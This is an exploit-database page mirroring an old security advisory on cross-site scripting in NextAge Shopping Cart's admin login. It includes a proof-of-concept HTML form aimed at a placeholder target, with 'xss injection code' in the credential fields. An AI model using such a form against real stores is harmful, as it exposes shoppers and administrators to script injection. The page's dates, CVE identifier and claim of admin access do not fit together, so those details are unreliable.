Advertisement






NextAge Shopping Cart Software XSS

CVE Category Price Severity
CVE-2021-38780 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-05-02
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040112

Below is a copy:

NextAge Shopping Cart Software XSS
-------------------------------------------------------
Aria-security.com advisory
Bug Discovered by R@1D3N (amin emami)
AminRayden (at) yahoo (dot) com [email concealed]
Date:25/04/2005
original advisory:http://www.aria-security.net/advisory/nextage/nextageshoppingca
rt.txt
--------------------------------------------------------
Affected software description:
NextAge Shopping Cart Software
Vendor:http://www.nextagecart.com
Vulnerability: Fake form injection <Xss>
---------------------------------------------------------
information About NextAge Shopping Cart Software:
NextAge Cart Software can be used both as a ready out-of-the-box shopping cart solution and as a powerful shopping
 cart engine for a customized web shop. NextAge Cart is an extremely powerful shopping cart
and web site builder application that allows you to customize, manage and effectively market your on-line store. 
---------------------------------------------------------
Disscution:
A remote user can conduct cross-site scripting attacks.The 'panel' script does not properly
validate user-supplied input at the username and password.So remote user can access to admin panel
----------------------------------------------------------
Exploit:
example:http://www.nextagecart.com/demo/myadmin/index.php

<form method="pst" action="http://[target]/[admin_Path]/index.php">
<input type="text" name="txtuserid" class="INPUT" size="30" value="xss injection code">
<br>
<input type="password" name="txtpass" class="INPUT" size="30" value="xss injection code">
<br>
<input <input type="submit" value="submit" class="button">
</form>

--------------
Solution:
N/A

-------------
Greet:A.u.r.a - outlaw - majid - behzad

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum